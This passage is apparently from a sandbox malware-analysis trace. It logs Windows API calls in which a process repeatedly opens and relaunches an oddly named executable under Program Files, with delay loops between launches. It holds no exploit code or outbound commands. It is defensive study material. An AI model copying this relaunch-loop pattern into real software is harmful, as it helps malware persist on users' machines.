(dwMilliseconds=0x1388) [0192.513] Sleep (dwMilliseconds=0x1388) [0192.515] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.515] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x3a4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.515] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.515] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65900) returned 1 [0192.515] NtQueryInformationFile (in: FileHandle=0x3a4, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.515] NtClose (Handle=0x3a4) returned 0x0 [0192.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.516] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x3a4, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.516] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.516] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0192.516] NtClose (Handle=0x3a4) returned 0x0 [0192.518] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1bb0, hThread=0x3a4, dwProcessId=0xa8c, dwThreadId=0x6f4), hNewToken=0x0) returned 1 [0192.540] Sleep (dwMilliseconds=0x1388) [0192.542] Sleep (dwMilliseconds=0x1388) [0192.544] Sleep (dwMilliseconds=0x1388) [0192.545] Sleep (dwMilliseconds=0x1388) [0192.547] Sleep (dwMilliseconds=0x1388) [0192.549] Sleep (dwMilliseconds=0x1388) [0192.555] Sleep (dwMilliseconds=0x1388) [0192.557] Sleep (dwMilliseconds=0x1388) [0192.558] Sleep (dwMilliseconds=0x1388) [0192.560] Sleep (dwMilliseconds=0x1388) [0192.567] Sleep (dwMilliseconds=0x1388) [0192.572] Sleep (dwMilliseconds=0x1388) [0192.574] Sleep (dwMilliseconds=0x1388) [0192.575] Sleep (dwMilliseconds=0x1388) [0192.577] Sleep (dwMilliseconds=0x1388) [0192.579] Sleep (dwMilliseconds=0x1388) [0192.580] Sleep (dwMilliseconds=0x1388) [0192.582] Sleep (dwMilliseconds=0x1388) [0192.643] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.643] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bd0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.643] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.644] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65a80) returned 1 [0192.644] NtQueryInformationFile (in: FileHandle=0x1bd0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.644] NtClose (Handle=0x1bd0) returned 0x0 [0192.644] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.644] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1bd0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.644] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.644] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64980) returned 1 [0192.644] NtClose (Handle=0x1bd0) returned 0x0 [0192.646] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1990, hThread=0x1bd0, dwProcessId=0xaf4, dwThreadId=0x578), hNewToken=0x0) returned 1 [0192.671] Sleep (dwMilliseconds=0x1388) [0192.672] Sleep (dwMilliseconds=0x1388) [0192.674] Sleep (dwMilliseconds=0x1388) [0192.675] Sleep (dwMilliseconds=0x1388) [0192.677] Sleep (dwMilliseconds=0x1388) [0192.678] Sleep (dwMilliseconds=0x1388) [0192.680] Sleep (dwMilliseconds=0x1388) [0192.685] Sleep (dwMilliseconds=0x1388) [0192.687] Sleep (dwMilliseconds=0x1388) [0192.688] Sleep (dwMilliseconds=0x1388) [0192.690] Sleep (dwMilliseconds=0x1388) [0192.696] Sleep (dwMilliseconds=0x1388) [0192.702] Sleep (dwMilliseconds=0x1388) [0192.703] Sleep (dwMilliseconds=0x1388) [0192.705] Sleep (dwMilliseconds=0x1388) [0192.706] Sleep (dwMilliseconds=0x1388) [0192.708] Sleep (dwMilliseconds=0x1388) [0192.709] Sleep (dwMilliseconds=0x1388) [0192.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.711] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a70, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.711] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.711] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64900) returned 1 [0192.711] NtQueryInformationFile (in: FileHandle=0x1a70, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.711] NtClose (Handle=0x1a70) returned 0x0 [0192.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.711] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1a70, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.712] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.712] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64c00) returned 1 [0192.712] NtClose (Handle=0x1a70) returned 0x0 [0192.718] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1918, hThread=0x1a70, dwProcessId=0xf70, dwThreadId=0x137c), hNewToken=0x0) returned 1 [0192.727] Sleep (dwMilliseconds=0x1388) [0192.728] Sleep (dwMilliseconds=0x1388) [0192.739] Sleep (dwMilliseconds=0x1388) [0192.748] Sleep (dwMilliseconds=0x1388) [0192.749] Sleep (dwMilliseconds=0x1388) [0192.751] Sleep (dwMilliseconds=0x1388) [0192.752] Sleep (dwMilliseconds=0x1388) [0192.754] Sleep (dwMilliseconds=0x1388) [0192.755] Sleep (dwMilliseconds=0x1388) [0192.757] Sleep (dwMilliseconds=0x1388) [0192.758] Sleep (dwMilliseconds=0x1388) [0192.764] Sleep (dwMilliseconds=0x1388) [0192.766] Sleep (dwMilliseconds=0x1388) [0192.767] Sleep (dwMilliseconds=0x1388) [0192.770] Sleep (dwMilliseconds=0x1388) [0192.771] Sleep (dwMilliseconds=0x1388) [0192.773] Sleep (dwMilliseconds=0x1388) [0192.774] Sleep (dwMilliseconds=0x1388) [0192.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.776] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cc8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.776] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.776] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64580) returned 1 [0192.776] NtQueryInformationFile (in: FileHandle=0x1cc8, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.776] NtClose (Handle=0x1cc8) returned 0x0 [0192.776] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.776] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x1cc8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.776] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.776] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65c80) returned 1 [0192.776] NtClose (Handle=0x1cc8) returned 0x0 [0192.784] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x14a8, hThread=0x1cc8, dwProcessId=0x360, dwThreadId=0x410), hNewToken=0x0) returned 1 [0192.799] Sleep (dwMilliseconds=0x1388) [0192.800] Sleep (dwMilliseconds=0x1388) [0192.802] Sleep (dwMilliseconds=0x1388) [0192.803] Sleep (dwMilliseconds=0x1388) [0192.805] Sleep (dwMilliseconds=0x1388) [0192.806] Sleep (dwMilliseconds=0x1388) [0192.808] Sleep (dwMilliseconds=0x1388) [0192.818] Sleep (dwMilliseconds=0x1388) [0192.820] Sleep (dwMilliseconds=0x1388) [0192.888] Sleep (dwMilliseconds=0x1388) [0192.896] Sleep (dwMilliseconds=0x1388) [0192.897] Sleep (dwMilliseconds=0x1388) [0192.899] Sleep (dwMilliseconds=0x1388) [0192.900] Sleep (dwMilliseconds=0x1388) [0192.902] Sleep (dwMilliseconds=0x1388) [0192.903] Sleep (dwMilliseconds=0x1388) [0192.905] Sleep (dwMilliseconds=0x1388) [0192.909] Sleep (dwMilliseconds=0x1388) [0192.911] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.911] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.911] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.911] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64700) returned 1 [0192.911] NtQueryInformationFile (in: FileHandle=0x19a0, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.911] NtClose (Handle=0x19a0) returned 0x0 [0192.911] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.911] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19a0, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.911] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.911] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64900) returned 1 [0192.911] NtClose (Handle=0x19a0) returned 0x0 [0192.913] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1c8c, hThread=0x19a0, dwProcessId=0xf6c, dwThreadId=0x858), hNewToken=0x0) returned 1 [0192.945] Sleep (dwMilliseconds=0x1388) [0192.947] Sleep (dwMilliseconds=0x1388) [0192.948] Sleep (dwMilliseconds=0x1388) [0192.949] Sleep (dwMilliseconds=0x1388) [0192.951] Sleep (dwMilliseconds=0x1388) [0192.953] Sleep (dwMilliseconds=0x1388) [0192.962] Sleep (dwMilliseconds=0x1388) [0192.963] Sleep (dwMilliseconds=0x1388) [0192.965] Sleep (dwMilliseconds=0x1388) [0192.967] Sleep (dwMilliseconds=0x1388) [0192.968] Sleep (dwMilliseconds=0x1388) [0192.973] Sleep (dwMilliseconds=0x1388) [0192.975] Sleep (dwMilliseconds=0x1388) [0192.976] Sleep (dwMilliseconds=0x1388) [0192.978] Sleep (dwMilliseconds=0x1388) [0192.979] Sleep (dwMilliseconds=0x1388) [0192.980] Sleep (dwMilliseconds=0x1388) [0192.990] Sleep (dwMilliseconds=0x1388) [0192.992] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.992] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19c8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.992] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.992] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c64f00) returned 1 [0192.992] NtQueryInformationFile (in: FileHandle=0x19c8, IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60, Length=0x18, FileInformationClass=0x5 | out: IoStatusBlock=0x122bfd50, FileInformation=0x122bfd60) returned 0x0 [0192.992] NtClose (Handle=0x19c8) returned 0x0 [0192.992] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0192.992] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x0, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x122bfd40*=0x19c8, IoStatusBlock=0x122bfd50*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0192.992] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x122bfcc0 | out: HeapArray=0x122bfcc0*=0x570000) returned 0x5 [0192.992] RtlFreeHeap (HeapHandle=0x570000, Flags=0x0, BaseAddress=0x4c65900) returned 1 [0192.992] NtClose (Handle=0x19c8) returned 0x0 [0192.994] CreateProcessInternalW (in: hUserToken=0x0, lpApplicationName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x122bfea0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x122bfe80, hNewToken=0x0 | out: lpProcessInformation=0x122bfe80*(hProcess=0x1d28, hThread=0x19c8, dwProcessId=0x9f8, dwThreadId=0x6e4), hNewToken=0x0) returned 1 [0193.007] Sleep (dwMilliseconds=0x1388) [0193.009] Sleep (dwMilliseconds=0x1388) [0193.010] Sleep (dwMilliseconds=0x1388) [0193.012] Sleep (dwMilliseconds=0x1388) [0193.013] Sleep (dwMilliseconds=0x1388) [0193.015] Sleep (dwMilliseconds=0x1388) [0193.017] Sleep (dwMilliseconds=0x1388) [0193.018] Sleep (dwMilliseconds=0x1388) [0193.022] Sleep (dwMilliseconds=0x1388) [0193.024] Sleep (dwMilliseconds=0x1388) [0193.034] Sleep (dwMilliseconds=0x1388) [0193.039] Sleep (dwMilliseconds=0x1388) [0193.040] Sleep (dwMilliseconds=0x1388) [0193.042] Sleep (dwMilliseconds=0x1388) [0193.043] Sleep (dwMilliseconds=0x1388) [0193.045] Sleep (dwMilliseconds=0x1388) [0193.046] Sleep (dwMilliseconds=0x1388) [0193.048] Sleep (dwMilliseconds=0x1388) [0193.049] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtPathName=0x122bfda0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0193.049] NtCreateFile (in: FileHandle=0x122bfd40, DesiredAccess=0x120089, ObjectAttributes=0x122bfdb0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x122bfd50, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, 